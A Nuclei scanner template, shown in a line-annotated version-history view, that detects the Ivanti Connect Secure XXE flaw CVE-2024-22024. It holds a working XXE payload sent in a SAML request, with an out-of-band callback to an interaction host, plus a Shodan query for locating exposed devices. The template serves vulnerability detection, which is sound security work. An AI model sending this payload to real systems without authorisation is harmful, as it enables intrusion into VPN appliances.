2024-02-09 07:59:13 +00:00
|
|
|
id: CVE-2024-22024
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Ivanti Connect Secure - XXE
|
|
|
|
author: watchTowr
|
|
|
|
severity: high
|
2024-02-09 13:14:36 +00:00
|
|
|
description: |
|
|
|
|
Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
|
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
|
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
|
2024-02-09 07:59:13 +00:00
|
|
|
reference:
|
|
|
|
- https://labs.watchtowr.com/are-we-now-part-of-ivanti/
|
2024-02-09 08:03:37 +00:00
|
|
|
- https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
|
2024-02-09 07:59:13 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
|
|
|
vendor: ivanti
|
|
|
|
product: "connect_secure"
|
|
|
|
shodan-query: "html:\"welcome.cgi?p=logo\""
|
2024-05-03 02:29:56 +00:00
|
|
|
tags: cve,cve2024,xxe,ivanti
|
2024-02-09 07:59:13 +00:00
|
|
|
|
|
|
|
variables:
|
2024-02-09 13:14:36 +00:00
|
|
|
payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
|
|
|
|
"http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'
|
2024-02-09 07:59:13 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
SAMLRequest={{base64(payload)}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2024-02-09 08:03:37 +00:00
|
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
2024-02-09 07:59:13 +00:00
|
|
|
words:
|
|
|
|
- "dns"
|
2024-02-09 08:03:37 +00:00
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '/dana-na/'
|
|
|
|
- 'WriteCSS'
|
|
|
|
condition: and
|
2024-05-03 08:43:05 +00:00
|
|
|
# digest: 4a0a00473045022100b30b610e83925ba39d984d8e235e97014a180a7e945b4a35faec7386faa1b79b022026685bd4cdedbb97d9918ebdd5f362731b82b6368331fc30b6dcbfef0acaccdb:922c64590222798bb761d5b6d8e72950
|